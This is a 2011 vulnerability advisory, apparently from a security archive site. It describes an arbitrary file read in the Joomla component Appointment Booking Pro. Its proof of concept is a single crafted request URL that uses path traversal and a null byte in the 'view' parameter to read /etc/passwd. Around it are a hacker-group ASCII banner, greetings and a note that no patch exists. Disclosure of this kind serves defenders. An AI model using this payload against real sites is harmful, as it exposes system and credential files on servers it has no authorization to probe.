Joomla Appointment Booking Pro Arbitrary File Reading

2011.07.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Appointment Booking Pro is a native Joomla component ================================= Last login: Tue Jun 7 2010 10:20:22 on ttys000 ______ ___ ______ ___/ / / / / / / /___ ____ ___/__ / / ____ ____ _______ ____ ___/ / : / / / \/__ \/ / / / \/ \/ \/ / \/ \/ / | / / / / / / / / / / / / / /__/ / /__/ / / / / --X-- / / / / / / / / / / / / / / / /__ / __/ / / |\____/__/__/\____/\____/__/__/__/\____/__/ /__/ / /\____/\____/ : ____ \____/: / \____ ____ ____ ____ ____ | / / / \/ \/ \/ \/ --X-- Don Tukulesto / / /__/ /__/ / / /__/ /__/| / / / / / / / __/__ /__ / : /__/__/\____/\____/\____/ / / / / www.indonesiancoder.com\____/\____/ Author : Don Tukulesto (root@indonesiancoder.com) Homepage : http://indonesiancoder.com Published : July 17, 2011 Tested On : OS X 10.5.8 ================================= ================================= | Software Info | ================================= [>] Vendor : http://www.appointmentbookingpro.com/ [>] Software : Appointment Booking Pro - ABPro Appointment Booking Pro is an appointment booking or scheduling, web site component. [>] Cost : $59 I. Proof of Concept ================================= index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000 III. Vendor patch ================================= Currently manufacturers do not provide patches or upgrades. ================================= [>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID [>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab [>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau [>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n We are the watchmen, the hackers who quietly observe the scene. bit.ly/OpIDC =================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top